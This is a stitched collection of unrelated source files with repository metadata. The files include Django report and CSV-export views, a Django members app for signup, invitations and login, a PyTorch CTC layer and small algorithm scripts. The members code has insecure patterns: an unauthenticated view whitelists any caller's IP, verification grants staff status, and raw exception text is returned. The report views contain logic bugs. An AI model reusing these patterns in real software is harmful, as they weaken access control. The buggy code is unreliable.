full_region_results_dict[result['year']][result['tod']] += result['time_benefit'] + result['operating_cost_benefit'] + result['toll_benefit'] + result['fare_benefit'] + result['parking_benefit'] + result['unreliability_benefit']
full_region_results = []
years = full_region_results_dict.keys()
years.sort()
for year in years:
full_region_results.append(full_region_results_dict[year])
#calculate full region NPV
full_region_benefit_npv = {}
#full_region_toll_npv = 0
for year in years:
for key in full_region_results_dict[year].keys():
if not full_region_benefit_npv.has_key(key):
full_region_benefit_npv[key] = full_region_results_dict[year][key] / (1 + analysis.real_discount_rate)**(year - current_year)
else:
full_region_benefit_npv[key] += full_region_results_dict[year][key] / (1 + analysis.real_discount_rate)**(year - current_year)
full_region_results.append(full_region_benefit_npv)
if analysis.region.id != 1:
subregion_benefits_raw = benefit_results.filter(region=analysis.region.id, user_class='all').order_by('year').values()
subregion_results_dict = {}
for result in subregion_results_dict:
if not subregion_results_dict.has_key(result['year']):
subregion_results_dict[result['year']] = {'year':result['year']}
if not subregion_results_dict[result['year']].has_key(result['tod']):
subregion_results_dict[result['year']][result['tod']] = 0
full_region_results_dict[result['year']][result['tod']] += result['time_benefit'] + result['operating_cost_benefit'] + result['toll_benefit'] + result['fare_benefit'] + result['parking_benefit'] + result['unreliability_benefit']
subregion_results = []
years = subregion_results_dict.keys()
years.sort()
for year in years:
subregion_results.append(subregion_results_dict[year])
#calculate full region NPV
subregion_benefit_npv = {}
#subregion_toll_npv = 0
for year in years:
if not full_region_benefit_npv.has_key(key):
subregion_benefit_npv[key] = full_region_results_dict[year][key] / (1 + analysis.real_discount_rate)**(year - current_year)
else:
subregion_benefit_npv[key] += full_region_results_dict[year][key] / (1 + analysis.real_discount_rate)**(year - current_year)
else:
subregion_results=None
subregion_benefit_npv=0
return render_to_response(
'tod_report.html',{
'analysis': analysis,
'full_region_results': full_region_results,
'full_region_benefit_npv': full_region_benefit_npv,
'subregion_results': subregion_results,
'subregion_benefit_npv': subregion_benefit_npv
}
)
def user_class_report(request):
analysis = Analysis.objects.get(id=request.session.get('analysis_id'))
base_year = int(analysis.scenario.split('_')[1][:4])
current_year = datetime.now().year
benefit_results = BenefitResult.objects.filter(analysis=analysis)
acct_results = AccountingResult.objects.filter(analysis=analysis)
date_prepared = datetime.now()
#create full region results
full_region_benefits_raw = benefit_results.filter(region=1, tod='all').order_by('year').values()
full_region_results_dict = {}
for result in full_region_benefits_raw:
if not full_region_results_dict.has_key(result['year']):
full_region_results_dict[result['year']] = {'year':result['year']}
if not full_region_results_dict[result['year']].has_key(result['user_class']):
full_region_results_dict[result['year']][result['user_class']] = 0
full_region_results_dict[result['year']][result['user_class']] += result['time_benefit'] + result['operating_cost_benefit'] + result['toll_benefit'] + result['fare_benefit'] + result['parking_benefit'] + result['unreliability_benefit']
full_region_results = []
years = full_region_results_dict.keys()
years.sort()
for year in years:
full_region_results.append(full_region_results_dict[year])
#calculate full region NPV
full_region_benefit_npv = {}
#full_region_toll_npv = 0
for year in years:
for key in full_region_results_dict[year].keys():
if not full_region_benefit_npv.has_key(key):
full_region_benefit_npv[key] = full_region_results_dict[year][key] / (1 + analysis.real_discount_rate)**(year - current_year)
else:
full_region_benefit_npv[key] += full_region_results_dict[year][key] / (1 + analysis.real_discount_rate)**(year - current_year)
full_region_results.append(full_region_benefit_npv)
if analysis.region.id != 1:
subregion_results_raw = benefit_results.filter(region=analysis.region.id, tod='all').order_by('year').values()
subregion_results_dict = {}
for result in subregion_results_raw:
if not subregion_results_dict.has_key(result['year']):
subregion_results_dict[result['year']] = {'year':result['year']}
if not subregion_results_dict[result['year']].has_key(result['user_class']):
subregion_results_dict[result['year']][result['user_class']] = 0
subregion_results_dict[result['year']][result['user_class']] += result['time_benefit'] + result['operating_cost_benefit'] + result['toll_benefit'] + result['fare_benefit'] + result['parking_benefit'] + result['unreliability_benefit']
subregion_results = []
years = subregion_results_dict.keys()
years.sort()
for year in years:
subregion_results.append(subregion_results_dict[year])
#calculate full region NPV
subregion_benefit_npv = {}
#subregion_toll_npv = 0
for year in years:
if not full_region_benefit_npv.has_key(key):
subregion_benefit_npv[key] = full_region_results_dict[year][key] / (1 + analysis.real_discount_rate)**(year - current_year)
else:
subregion_benefit_npv[key] += full_region_results_dict[year][key] / (1 + analysis.real_discount_rate)**(year - current_year)
else:
subregion_results=None
subregion_benefit_npv=0
return render_to_response(
'user_class_report.html',{
'analysis': analysis,
'full_region_results': full_region_results,
'full_region_benefit_npv': full_region_benefit_npv,
'subregion_results': subregion_results,
'subregion_benefit_npv': subregion_benefit_npv
}
)
def emissions_report(request):
analysis = Analysis.objects.get(id=request.session.get('analysis_id'))
base_year = int(analysis.scenario.split('_')[1][:4])
current_year = datetime.now().year
emission_results = EmissionResult.objects.filter(analysis=analysis)
date_prepared = datetime.now()
#create full region results
full_region_benefits_raw = emission_results.order_by('year').values()
full_region_results_dict = {}
vehicle_types={'heavy_truck':'Heavy Truck', 'medium_truck':'Medium Truck', 'light_truck':'Light Truck', 'car':'Car'}
for result in full_region_benefits_raw:
pollutant_name = Pollutant.objects.get(pk=result['pollutant_id']).name
if not full_region_results_dict.has_key(result['year']):
full_region_results_dict[result['year']] = {} #'year':result['year']
if not full_region_results_dict[result['year']].has_key(pollutant_name):
full_region_results_dict[result['year']][pollutant_name] = {'pollutant_name': pollutant_name, 'year': result['year']}
if not full_region_results_dict[result['year']][pollutant_name].has_key(result['vehicle_type']):
full_region_results_dict[result['year']][pollutant_name][result['vehicle_type']] = 0
full_region_results_dict[result['year']][pollutant_name][result['vehicle_type']] += result['difference']
full_region_results = []
years = full_region_results_dict.keys()
years.sort()
for year in years:
pollutants = full_region_results_dict[year].keys()
pollutants.sort()
for p in pollutants:
full_region_results.append(full_region_results_dict[year][p])
##calculate full region NPV
#full_region_benefit_npv = {}
##full_region_toll_npv = 0
#for year in years:
# for key in full_region_results_dict[year].keys():
# if not full_region_benefit_npv.has_key(key):
# full_region_benefit_npv[key] = full_region_results_dict[year][key] / (1 + analysis.real_discount_rate)**(year - current_year)
# else:
# full_region_benefit_npv[key] += full_region_results_dict[year][key] / (1 + analysis.real_discount_rate)**(year - current_year)
#
#full_region_results.append(full_region_benefit_npv)
return render_to_response(
'emissions_report.html',{
'analysis': analysis,
'full_region_results': full_region_results,
}
)
def safety_report(request):
analysis = Analysis.objects.get(id=request.session.get('analysis_id'))
base_year = int(analysis.scenario.split('_')[1][:4])
current_year = datetime.now().year
safety_results = AccidentResult.objects.filter(analysis=analysis)
date_prepared = datetime.now()
#create full region results
full_region_benefits_raw = safety_results.order_by('year').values()
full_region_results_dict = {}
for result in full_region_benefits_raw:
if not full_region_results_dict.has_key(result['year']):
full_region_results_dict[result['year']] = {'year':result['year'], 'property_damage_only':0, 'injury':0, 'fatality': 0, 'total':0}
full_region_results_dict[result['year']]['property_damage_only'] += result['property_damage_only_benefit']
full_region_results_dict[result['year']]['injury'] += result['injury_benefit']
full_region_results_dict[result['year']]['fatality'] += result['fatality_benefit']
full_region_results_dict[result['year']]['total'] += result['fatality_benefit'] + result['injury_benefit'] + result['property_damage_only_benefit']
full_region_results = []
years = full_region_results_dict.keys()
years.sort()
for year in years:
full_region_results.append(full_region_results_dict[year])
##calculate full region NPV
#full_region_benefit_npv = {}
##full_region_toll_npv = 0
#for year in years:
# for key in full_region_results_dict[year].keys():
# if not full_region_benefit_npv.has_key(key):
# full_region_benefit_npv[key] = full_region_results_dict[year][key] / (1 + analysis.real_discount_rate)**(year - current_year)
# else:
# full_region_benefit_npv[key] += full_region_results_dict[year][key] / (1 + analysis.real_discount_rate)**(year - current_year)
#
#full_region_results.append(full_region_benefit_npv)
return render_to_response(
'safety_report.html',{
'analysis': analysis,
'full_region_results': full_region_results,
}
)
def benefits_csv(request):
try:
analysis = Analysis.objects.get(id=request.session.get('analysis_id'))
except:
return HttpResponseRedirect('/')
benefit_results = BenefitResult.objects.filter(analysis=analysis.id).values()
if not len(benefit_results) > 0:
return HttpResponseRedirect('/')
data = []
header = []
for field in BenefitResult._meta.fields:
if field.name not in ('id','analysis'):
header.append(field.name)
data.append(header)
for result in benefit_results:
row = []
for field in header:
if field == 'region':
row.append(Region.objects.get(id=result['region_id']).name)
else:
row.append(result[field])
data.append(row)
# return HttpResponseRedirect('/')
# Create the HttpResponse object with the appropriate CSV header.
response = HttpResponse(mimetype='text/csv')
response['Content-Disposition'] = 'attachment; filename=%s_benefit_results.csv' %(replace(analysis.title,' ','_'))
writer = csv.writer(response)
for row in data:
writer.writerow(row)
return response
def accounting_csv(request):
try:
analysis = Analysis.objects.get(id=request.session.get('analysis_id'))
except:
return HttpResponseRedirect('/')
accounting_results = AccountingResult.objects.filter(analysis=analysis.id).values()
if not len(accounting_results) > 0:
return HttpResponseRedirect('/')
data = []
header = []
for field in AccountingResult._meta.fields:
if field.name not in ('id','analysis'):
header.append(field.name)
data.append(header)
for result in accounting_results:
row = []
for field in header:
if field == 'region':
row.append(Region.objects.get(id=result['region_id']).name)
else:
row.append(result[field])
data.append(row)
# return HttpResponseRedirect('/')
# Create the HttpResponse object with the appropriate CSV header.
response = HttpResponse(mimetype='text/csv')
response['Content-Disposition'] = 'attachment; filename=%s_accounting_results.csv' %(replace(analysis.title,' ','_'))
writer = csv.writer(response)
for row in data:
writer.writerow(row)
return response
def safety_csv(request):
try:
analysis = Analysis.objects.get(id=request.session.get('analysis_id'))
except:
return HttpResponseRedirect('/')
accidents_results = AccidentResult.objects.filter(analysis=analysis.id).values()
if not len(accidents_results) > 0:
return HttpResponseRedirect('/')
data = []
header = []
for field in AccidentResult._meta.fields:
if field.name not in ('id','analysis'):
header.append(field.name)
data.append(header)
for result in accidents_results:
row = []
for field in header:
row.append(result[field])
data.append(row)
# return HttpResponseRedirect('/')
# Create the HttpResponse object with the appropriate CSV header.
response = HttpResponse(mimetype='text/csv')
response['Content-Disposition'] = 'attachment; filename=%s_safety_results.csv' %(replace(analysis.title,' ','_'))
writer = csv.writer(response)
for row in data:
writer.writerow(row)
return response
def emissions_csv(request):
try:
analysis = Analysis.objects.get(id=request.session.get('analysis_id'))
except:
return HttpResponseRedirect('/')
emissions_results = EmissionResult.objects.filter(analysis=analysis.id).values()
if not len(emissions_results) > 0:
return HttpResponseRedirect('/')
data = []
header = []
for field in EmissionResult._meta.fields:
if field.name not in ('id','analysis'):
header.append(field.name)
data.append(header)
for result in emissions_results:
row = []
for field in header:
if field == 'pollutant':
row.append(Pollutant.objects.get(id=result['pollutant_id']).short_name)
else:
row.append(result[field])
data.append(row)
# return HttpResponseRedirect('/')
# Create the HttpResponse object with the appropriate CSV header.
response = HttpResponse(mimetype='text/csv')
response['Content-Disposition'] = 'attachment; filename=%s_emissions_results.csv' %(replace(analysis.title,' ','_'))
writer = csv.writer(response)
for row in data:
writer.writerow(row)
return response
def restart(request):
"""
Clears the session and send them back home
"""
for key in request.session.keys():
request.session.__delitem__(key)
return HttpResponseRedirect('/')
|
[
"peter@thoughtspot.net"
] |
peter@thoughtspot.net
|
5baf1e3833e9e4c95ed0c4f8f8d4e52613083bd9
|
6c9f0e5996664dd9d92debcaefe438d9ed3b3ca6
|
/lib/networks/head/Rec_CTCHead.py
|
f3635e0215f4a2305db762c0b297de9dc9bd5d08
|
[
"MIT"
] |
permissive
|
yingbiaoluo/OCR_deployment
|
a978a60252c93c015c30cd2df44e268ff6149ea0
|
a2f4635d328e7bd484fb1c86da3ca79306d852a7
|
refs/heads/master
| 2023-04-06T10:33:39.590716
| 2021-04-08T08:39:01
| 2021-04-08T08:39:01
| 276,579,485
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 387
|
py
|
from torch import nn
import torch.nn.functional as F
class CTC(nn.Module):
def __init__(self, in_channels, n_class, **kwargs):
super().__init__()
self.n_class = n_class
self.fc = nn.Linear(in_channels, n_class)
def forward(self, x): # [batch, 141, 512]
x = self.fc(x) # [batch, 141, 6773]
x = F.log_softmax(x, dim=2)
return x
|
[
"yingbiao_luo@163.com"
] |
yingbiao_luo@163.com
|
dd8d15a25768c4147ce2c773a5b0dce3c3c5ba8c
|
4069734a3206e3def5dfa0f4205861a07583b451
|
/apps/members/views.py
|
e080f4310902d22f259d8d769e0df74e36bd08ce
|
[] |
no_license
|
shredz/Tool
|
93155000727694d032f2c840a42fa7cf0e96e7a5
|
814d0c55b856c0b8a51fa432def351301749d9df
|
refs/heads/master
| 2021-01-01T20:34:41.130137
| 2011-11-17T08:11:04
| 2011-11-17T08:11:04
| 2,786,866
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 13,360
|
py
|
from django.core.context_processors import csrf
from django.http import HttpResponse, HttpResponseRedirect, Http404
from django.contrib.auth import authenticate, login as userlogin, logout as userlogout
from django.forms.util import ErrorList
from django.shortcuts import render_to_response
from models import *
from forms import *
from apps.geo.models import *
from apps.core.models import *
from apps.spiffs.models import *
import datetime
import simplejson as json
from libs.utils import Response
import settings
def invitation_landing(request,invid,name):
if request.user.is_authenticated():
return HttpResponseRedirect('/members/')
first_name = ""
last_name = ""
parts = name.split("/")
if len(parts) == 1:
first_name = parts[0]
elif len(parts) > 1:
first_name = parts[0]
last_name = parts[1]
try:
i = Invitation.objects.get(curl=invid)
except:
raise Http404()
if i.prospect.first_name == first_name and i.prospect.last_name == last_name and (i.status == 'SENT' or i.status == 'VISITED'):
form = SignupForm(
{
"email" : i.prospect.email,
"first_name" : i.prospect.first_name,
"last_name" : i.prospect.last_name,
}
)
request.session["invitation"] = i.id
i.status = 'VISITED'
i.save()
return Response.render_form(request,'members/signup.html',form,errors=False)
else:
raise Http404()
#p = Prospect.objects.get(id=invid,first_name=first_name,last_name=last_name,source="Invitation")
return HttpResponse(i)
def fbinvite(request):
params = {"appId" : settings.CRED["FACEBOOK_APP_ID"] }
return render_to_response("members/fbinvite.html",params)
def invite(request):
if not request.user.is_authenticated():
return Response.send_to_login(request)
message = None
if request.method == 'POST':
form = InvitationForm(request.POST)
if form.is_valid():
p = Prospect(
email = form.cleaned_data['email'],
first_name = form.cleaned_data['first_name'],
last_name = form.cleaned_data['last_name'],
source = "Invitation"
)
p.save()
invitation = Invitation(
sender = User.instance(request.user),
prospect = p
)
invitation.create_curl()
invitation.save()
invitation.sendmail()
message = "An invitation has been sent to %s " % (p.email)
form = InvitationForm()
else:
pass
else:
form = InvitationForm()
return Response.render ("members/invite.html",{"form" : form , "appId" : settings.CRED["FACEBOOK_APP_ID"], "message" : message},request)
def profile(request):
if not request.user.is_authenticated():
return Response.send_to_login(request)
param = {}
try:
param['needs_username_correction'] = request.session['needs_username_correction']
except Exception,ex:
param['needs_username_correction'] = False
user = User.instance(request.user)
if request.method == 'POST':
form = ProfileForm(request.POST)
param['form'] = form
param['errors'] = True
if form.is_valid():
username = form.cleaned_data['username']
try:
u = User.objects.get(username=username)
if u.id != user.id:
form.errors['username'] = ErrorList( [u'Username already exists'])
except:
pass
email = form.cleaned_data['email']
try:
u = User.objects.get(email=email)
if u.id != user.id:
form.errors['email'] = ErrorList([u'Username with this email already exists'])
except:
pass
if not form.errors:
user.username = username
user.email = email
user.first_name = form.cleaned_data['first_name']
user.last_name = form.cleaned_data['last_name']
user.gender = form.cleaned_data['gender']
user.dob = form.cleaned_data['dob']
user.address.zipcode = form.cleaned_data['zipcode']
user.address.street_line_1 = form.cleaned_data['street_line_1']
user.address.street_line_2 = form.cleaned_data['street_line_2']
user.address.city = form.cleaned_data['city']
user.address.state = form.cleaned_data['state']
user.address.country = Country.objects.get(id=form.cleaned_data['country'])
user.address.save()
user.save()
try:
del request.session['needs_username_correction']
except:
pass
return HttpResponseRedirect('/members/')
else:
pass
else:
fn = user.first_name
if fn[0] == "(" and fn[-1] == ")":
fn = fn[2:-3]
ln = user.last_name
if ln[0] == "(" and ln[-1] == ")":
ln = ln[2:-3]
em = user.email
if em is None or em == "" or em == "None":
em = ""
un = user.username
if param['needs_username_correction']:
un = ""
param['form'] = ProfileForm(
{
"username" : un,
"email" : em,
"first_name" : fn,
"last_name" : ln,
"gender" : user.gender,
"dob" : user.dob,
"zipcode" : user.address.zipcode,
"street_line_1" : user.address.street_line_1,
"street_line_2" : user.address.street_line_2,
"city" : user.address.city,
"state" : user.address.state,
"country" : user.address.country.id,
}
)
param['errors'] = False
return Response.render ('members/profile.html',param,request)
def signup (request):
if request.user.is_authenticated():
return HttpResponseRedirect('/members/')
if request.method == 'POST':
form = SignupForm(request.POST)
if form.is_valid():
email1 = form.cleaned_data['email']
email2 = form.cleaned_data['email2']
if email1 != email2:
form.errors['email2'] = ErrorList([u'Emails do not match'])
try:
User.objects.get(email=email1)
form.errors['email'] = ErrorList([u'Username with this email already exists'])
except:
pass
username = form.cleaned_data['username']
try:
User.objects.get(username=username)
form.errors['username'] = ErrorList([u'Username already exists'])
except:
pass
password = form.cleaned_data['password']
if not form.errors:
first_name = form.cleaned_data['first_name']
last_name = form.cleaned_data['last_name']
gender = form.cleaned_data['gender']
dob = form.cleaned_data['dob']
country = Country.objects.get(id=1)
phonenumber = PhoneNumber(
countrycode = 0,
carriercode = 0,
number = 0,
)
phonenumber.save()
address = Address(
zipcode = "",
street_line_1 = "",
street_line_2 = "",
city = "",
state = "",
country = country,
location = country.location,
phonenumebr = phonenumber
)
address.save()
user = User (
username = username,
email = email1,
password = User.encode_pass(password),
first_name = first_name,
last_name = last_name,
dob = dob,
gender = gender,
address = address,
verification = User.create_verification("1"),
points = 0,
)
user.save()
reffered_by = False
try:
ref_id = request.session["f"]
reffered_by = User.objects.get(id=ref_id)
del request.session["f"]
except:
pass
invitation = False
try:
invitation = Invitation.objects.get(id=request.session["invitation"])
del request.session["invitation"]
except:
try:
invitation = Invitation.objects.get(prospect=Prospect.objects.get(email=user.email))
except:
pass
if invitation:
reffered_by = invitation.sender
invitation.status = "SIGNUP"
invitation.save()
if reffered_by:
ref = Referral(reffered_by=reffered_by,reffered_to=user)
ref.save()
user.send_verification_mail()
return HttpResponseRedirect('/members/')
else:
try:
request.session["f"] = request.GET["f"]
return HttpResponseRedirect("/members/signup/")
except:
pass
form = SignupForm()
return Response.render_form (request,'members/signup.html',form)
def dashboard(request):
if request.user.is_authenticated():
params = {}
params["user"] = User.instance(request.user)
#1- activities chart
params["activities"] = Activity.chart(params["user"],5)
#2- my deals [deals he is interested in]
params["mydeals"] = UserDeal.objects.filter(user=params["user"]).extra(order_by=['-added'])[:5]
#3- friends
params["friends"] = params["user"].friends
#4- recent activities
params["recent_points"] = Activity.recent(params["user"],5)
#-5 rewards
#-6 invite
params["iform"] = InvitationForm()
return Response.render("members/dashboard.html",params,request)
else:
return Response.send_to_login(request)
def index (request):
pass
def logout (request):
if request.user.is_authenticated():
userlogout(request)
return HttpResponseRedirect('/members/login/')
def login (request):
if request.user.is_authenticated():
return HttpResponseRedirect('/members/')
if request.method == 'POST':
form = LoginForm(request.POST)
if form.is_valid():
username = form.cleaned_data['username']
password = form.cleaned_data['password']
user = authenticate(username=username, password=password)
if user is None:
form.errors["username"] = ErrorList([u'Invalid Username or Password'])
else:
s_user = User.objects.get(id=user.id)
if s_user.verification.verified == False:
form.errors["username"] = ErrorList([u'User must be verified first due to "%s"' % (s_user.verification.purpose)])
elif user.is_active:
userlogin(request,user)
return Response.send_to_destination(request)
else:
form.errors["username"] = ErrorList([u'Account Disabled'])
else:
form = LoginForm()
return Response.render_form (request,'members/login.html',form)
def settings_view(request):
if request.user.is_authenticated():
if request.method == 'POST':
for cid in request.POST:
try:
c = Config.objects.get(id=cid)
c.value = request.POST[cid]
c.save()
except:
pass
configList = User.instance(request.user).get_all_config()
clm = 1
total_clm = 2
table = []
row = {}
for title in configList:
row[title] = configList[title]
clm = clm + 1
if clm > total_clm:
table.append(row)
row = {}
table.append(row)
c = {"table":table}
c.update(csrf(request))
return Response.render("members/settings.html", c , request)
else:
return Response.send_to_login(request)
def verify(request,code):
#http://localhost/members/v/yxdRRWPx22Fr/
if request.user.is_authenticated():
return HttpResponseRedirect('/members/')
try:
user = User.objects.get(verification=Verification.objects.get(code=code))
if user.verification.purpose == "1" and user.verification.verified == False:
user.verification.verified = True
user.verification.verified_on = datetime.datetime.now()
user.verification.save()
user.is_active = True
user.is_staff = True
user.save()
try:
ref = Referral.objects.get(reffered_to=user)
inv = Invitation.objects.get(sender=ref.reffered_by)
inv.status = 'VERIFIED'
inv.save()
except:
pass
return Response.send_to_login(request,False)
except Exception,e:
return HttpResponse(e)
def like_deal(request,deal_id):
if request.user.is_authenticated():
user = User.instance(request.user)
try:
deal = Deal.objects.get(id=deal_id)
except Deal.DoesNotExist, dne:
return Response({"success":False,"message":"Deal does not exist"})
try:
ud = UserDeal.objects.get(deal=deal,user=user)
return Response.json({"success":False,"message":"Already in my deals","at":str(ud.added)})
except UserDeal.DoesNotExist,ex:
ud = UserDeal(deal=deal,user=user)
ud.save()
return Response.json({"success":True,"message":"success added to my deals", "id":ud.id})
else:
return Response.send_to_login(request)
def landed(request):
try:
response = HttpResponse("SUCCESS")
max_age = 365*24*60*60
expires = datetime.datetime.strftime(datetime.datetime.utcnow() + datetime.timedelta(seconds=max_age), "%a, %d-%b-%Y %H:%M:%S GMT")
response.set_cookie("location", request.GET["loc"], max_age=max_age, expires=expires, domain=settings.SESSION_COOKIE_DOMAIN)
response.set_cookie("email", request.GET["email"], max_age=max_age, expires=expires, domain=settings.SESSION_COOKIE_DOMAIN)
return response
except Exception, ex:
return HttpResponse("FAILURE" + str(ex.message))
## TEST CODE
## TODO TO BE REMOVED FROM PRODUCTION
def clear_loc(request):
response = HttpResponseRedirect("/members/")
max_age = 0
expires = datetime.datetime.strftime(datetime.datetime.utcnow(),"%a, %d-%b-%Y %H:%M:%S GMT")
response.set_cookie("location", "", max_age=max_age, expires=expires, domain=settings.SESSION_COOKIE_DOMAIN)
response.set_cookie("email", "", max_age=max_age, expires=expires, domain=settings.SESSION_COOKIE_DOMAIN)
return response
def test (request):
return HttpResponse(request.COOKIES["location"])
def allow_me (request):
from apps.security.models import AllowedHosts
try:
AllowedHosts.objects.get(ip=request.META["REMOTE_ADDR"])
except AllowedHosts.DoesNotExist, dne:
AllowedHosts(ip=request.META["REMOTE_ADDR"]).save()
return Response.send_to("/")
|
[
"sharadpai111@gmail.com"
] |
sharadpai111@gmail.com
|
9e61ca0ec884517b5bc6f4f207ccc7ecc1fab5de
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02379/s853900815.py
|
e67e21597c716cb33d750d137584d5e4bcb61215
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 99
|
py
|
import math
x1, y1, x2, y2=map(float,input().split())
x=x1-x2
y=y1-y2
h=x**2+y**2
print(h**0.5)
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
8f6c052d6d1328a08dd9f26b998438597943d538
|
74b598e062cd1c14c5961ab7067adbacd46b848a
|
/lab_ai/03.keras_create_model.py
|
13c6532f6aed18a62f2563bf6d309968e4fac18f
|
[] |
no_license
|
taeryu0627/face_mask_detector
|
21cfa86a028055181d1d3be61344d518dbccf7ec
|
f9b96f0398b1dd541b1d381c7afe76ad8c6b4fd8
|
refs/heads/main
| 2023-06-11T06:10:00.270877
| 2021-06-30T12:47:43
| 2021-06-30T12:47:43
| 355,539,670
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 113
|
py
|
# 03. keras_create_model.py
import tensorflow as tf
model = tf.keras.applications.VGG16()
print(model.summary())
|
[
"taeryu0627@naver.com"
] |
taeryu0627@naver.com
|
63f60251d95b41c910e75b02eaf6ef5add1143b6
|
14e19bcaaf917924e7bb78e4f7e6b42662ff5164
|
/fancy_month01/day14_fancy/day14_1217_note/iteration_ex.py
|
80dc7ba2bb6684345580b2348bbc1ac2b70cfb80
|
[] |
no_license
|
Lzffancy/Aid_study
|
5b3538443ca0ad1107a83ef237459b035fef70d0
|
4ba5e5045371490d68459edd1f0a94963e0295b1
|
refs/heads/master
| 2023-02-22T19:11:00.867446
| 2021-01-25T13:01:35
| 2021-01-25T13:01:35
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 389
|
py
|
#--------------------
list1 = [1,2,3]
for each in list1:
print(each)
#--------------------
dict1 = {1:11,2:22,3:33}
iterator_dict1 = dict1.__iter__() #使其生成迭代器,dict成为迭代对象
while 1:
try:
key = iterator_dict1.__next__() #使用迭代器 迭代出结果
value =dict1[key]
print(key,value)
except StopIteration:
break
|
[
"731566721@qq.com"
] |
731566721@qq.com
|
0d12a4366c4ffdf0246d89a69acbbd0677ced682
|
603233844767fa25ee4d66697623174bd794a01b
|
/uc2_metric_generator.py
|
19c00aa099878acd4f337c33bc5c32e6e09384a6
|
[
"MIT"
] |
permissive
|
5g-media/cno-rl
|
3479507ebcba1e78167b05f924e45ba371a61cfd
|
264def52bfd25ca89209ad04a908c3c599dcca02
|
refs/heads/master
| 2022-04-20T14:19:16.532485
| 2020-04-15T10:41:06
| 2020-04-15T22:21:35
| 255,919,817
| 0
| 0
|
MIT
| 2020-04-15T21:59:34
| 2020-04-15T13:08:11
| null |
UTF-8
|
Python
| false
| false
| 1,882
|
py
|
from uc2_settings import METRIC_TEMPLATE, METRIC_TEMPLATE_UC2_EXEC, METRIC_TEMPLATE_UC2_CONF
def generate_metric_uc2_exec(metric_value, timestamp, tmp, vce_id):
#metric = METRIC_TEMPLATE_UC2_EXEC
metric = tmp
metric['execution']['value'] = metric_value
metric['execution']['mac'] = vce_id
#metric['metric']['timestamp'] = timestamp
return metric
def generate_metric_uc2_conf(metric_value, timestamp, tmp, vce_id):
metric_bitrate = {"bitrate": metric_value}
#metric = METRIC_TEMPLATE_UC2_CONF
metric = tmp
metric['vce']['mac'] = vce_id
metric['vce']['action'] = metric_bitrate
#metric['vce']['timestamp'] = timestamp
return metric
def generate_metric_uc2_tm(bw, tp, metric_tmp, metric_type, unit):
metric = metric_tmp
metric['unit'] = str(unit)
metric['vdu_uuid'] = 677
metric['value'] = bw
metric['type'] = str(metric_type)
metric['timestamp'] = tp
return metric
def generate_metric_uc2_vce(metric_value, timestamp, tmp, vce_id, video_bit_rates, profile):
metric = tmp
metric['id'] = vce_id #str
metric['utc_time'] = timestamp #int
metric['metric_x'] = video_bit_rates[int(metric_value[2])] #int
metric['metric_y'] = video_bit_rates[int(metric_value[3])] #int
metric['metric_z'] = profile
return metric
def generate_metric_uc2_cno(bandwidth, timestamp, tmp_metric, msg_type):
metric = tmp_metric
if (msg_type == "request"):
metric['sender'] = "UC_2"
metric['receiver'] = "O-CNO"
metric['timestamp'] = timestamp
metric['resource']['bw'] = bandwidth
metric['option'] = msg_type
elif (msg_type == "respond"):
metric['sender'] = "O-CNO"
metric['receiver'] = "UC_2"
metric['timestamp'] = timestamp
metric['resource']['bw'] = bandwidth
metric['option'] = msg_type
return metric
|
[
"m.kheirkhah@ucl.ac.uk"
] |
m.kheirkhah@ucl.ac.uk
|
9191c8485a0c9f112d79fc9f561e94b5c35a6caa
|
df264c442075e04bb09d82f9be1d915c070d7e09
|
/BJ/G4_15685_20210406.py
|
79e6ef62c989c5e56453a2dda3a95caa383459a1
|
[] |
no_license
|
Koozzi/Algorithms
|
ff7a73726f18e87cab9406e7b71cd5d1856df183
|
38048ac0774fcab3537bdd64f48cae7d9eb71e6f
|
refs/heads/master
| 2021-07-06T04:59:38.564772
| 2021-05-03T08:49:56
| 2021-05-03T08:49:56
| 231,848,463
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,213
|
py
|
'''
시작 00:00
제출 00:56
종료
'''
from copy import deepcopy
def get_next_location(I,J,last_i,last_j):
sub_i = I - last_i
sub_j = J - last_j
next_i = last_i + sub_j
next_j = last_j - sub_i
return next_i, next_j
def make_dragon_curve(dragon_curve):
next_dragon_curve = deepcopy(dragon_curve)
last_i, last_j = dragon_curve[-1]
init_length = len(next_dragon_curve)
for idx in range(init_length-2, -1, -1):
I, J = next_dragon_curve[idx]
next_i, next_j = get_next_location(I,J,last_i,last_j)
next_dragon_curve.append([next_i, next_j])
return next_dragon_curve
board = [[False for _ in range(101)] for _ in range(101)]
move = [[0,1],[-1,0],[0,-1],[1,0]]
N = int(input())
for _ in range(N):
J,I,D,S = map(int, input().split())
dragon_curve = [[I,J],[I+move[D][0], J+move[D][1]]]
for _ in range(S):
dragon_curve = make_dragon_curve(dragon_curve)
for dragon_i, dragon_j in dragon_curve:
board[dragon_i][dragon_j] = True
answer = 0
for i in range(100):
for j in range(100):
if board[i][j] and board[i][j+1] and board[i+1][j] and board[i+1][j+1]:
answer += 1
print(answer)
|
[
"koozzi666@gmail.com"
] |
koozzi666@gmail.com
|
d3ef6138de3e96f29127428c55728e1dbcddf131
|
cc02568e29d86674a0e8746a4dccb49f94933f15
|
/sbis.py
|
419e8bb2e8d31bb902784a41d95cc2eb13f1bc78
|
[] |
no_license
|
quicksilver32/rivals_finder_test
|
8f44fc97bfb5ecef2dce1907934b11c91e0e6270
|
863c50d1eaf49e53601904c08db703c91af85531
|
refs/heads/master
| 2020-04-08T23:47:02.205603
| 2018-12-01T15:04:31
| 2018-12-01T15:04:31
| 159,840,030
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,185
|
py
|
#!/usr/bin/python3
# coding=utf-8
import codecs
import pprint
import requests
import sys
sys.stdout = codecs.getwriter("utf-8")(sys.stdout.detach())
